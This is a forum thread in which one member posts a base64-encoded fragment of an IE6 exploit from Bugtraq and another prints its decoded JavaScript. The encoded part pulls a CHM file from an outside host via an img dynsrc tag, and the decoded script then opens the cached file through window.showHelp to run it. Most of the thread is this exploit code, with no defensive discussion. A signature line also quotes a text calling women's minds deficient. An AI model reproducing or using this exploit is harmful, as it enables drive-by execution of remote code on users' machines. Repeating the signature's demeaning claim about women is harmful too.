Interesting
Results 1 to 2 of 2

Thread: Interesting

  1. #1
    Senior Member
    Join Date
    Dec 2001
    Posts
    304

    Interesting

    Well i was going threw bugtraq and reading the post about IE6 labeled something like same girl different dress for all of you that go to bugtraq.

    Part of the code for the sploit is base64 encoded and it is as follows:
    PGltZyBkeW5zcmM9Imh0dHA6Ly93d3cubWFsd2FyZS5jb20vbW
    Fsd2FyZS9tYWx3YXJlLmNobSIgd2lkdGg9MSBoZWlnaHQ9MT4N
    Cg0KPFNDUklQVD4NCg0KLy8gNy4wMi4wMiBodHRwOi8vd3d3Lm
    1hbHdhcmUuY29tDQoNCi8vIHlvdSBtYXkgY29uc2lkZXIgd3Jp
    dGluZyBzZXZlcmFsIGxpbmVzDQovLyBpbiBjYXNlIG1hbHdhcm
    UuY2htIGFycml2ZXMgYXMgWzFdIG9yIFsyXSBldGMNCg0KZnVu
    Y3Rpb24gbWFsd2FyZSgpDQp7DQpzPWRvY3VtZW50LlVSTDsNCn
    BhdGg9cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7
    DQpwYXRoPXVuZXNjYXBlKHBhdGgpOw0KZG9jdW1lbnQud3JpdG
    UoJzxGT1JNIG5hbWU9Im1hbHdhcmUiIEFDVElPTj0iamF2YXNj
    cmlwdDp3aW5kb3cuc2hvd0hlbHAoZG9jdW1lbnQuZm9ybXNbMF
    0uZWxlbWVudHNbMF0udmFsdWUpIj4nKTsNCmRvY3VtZW50Lndy
    aXRlKCc8Zm9ybT48aW5wdXQgdHlwZT0iaGlkZGVuIiAgc2l6ZT
    0iNDAiIG1heGxlbmd0aD0iODAiIHZhbHVlPSInK3BhdGgrJ1xc
    bWFsd2FyZVsxXS5jaG0iPjwvZm9ybT4nKTsNCnNldFRpbWVvdX
    QoJ2RvY3VtZW50Lm1hbHdhcmUuc3VibWl0KCknLDEwMDAwKTsN
    CiB9IA0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwyNTAwKTsgIA
    0KPC9TQ1JJUFQ+DQogDQoNCg

    I decided to check to see what it decoded to so i use the handy dandy tools here at AO and put it in and select to decode. Its odd it says it decodes to and then all blank after that and then the page auto refreshes to just a blank page. Any other code that you put in there to decode it does it fine and does not do this. I wonder what the hell this decodes to and why its making ao do this?
    Violence breeds violence
    we need a world court
    not a republican with his hands covered in oil and military hardware lecturing us on world security!

  2. #2
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    here you go:



    <SCRIPT>

    // 7.02.02 http://www.malware.com

    // you may consider writing several lines
    // in case malware.chm arrives as [1] or [2] etc

    function malware()
    {
    s=document.URL;
    path=s.substr(-0,s.lastIndexOf("\\"));
    path=unescape(path);
    document.write('<FORM name="malware" ACTION="javascript:window.showHelp(document.forms[0].elements[0].value)">');
    document.write('<form><input type="hidden" size="40" maxlength="80" value="'+path+'\\malware[1].chm"></form>');
    setTimeout('document.malware.submit()',10000);
    }
    setTimeout("malware()",2500);
    </SCRIPT>
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •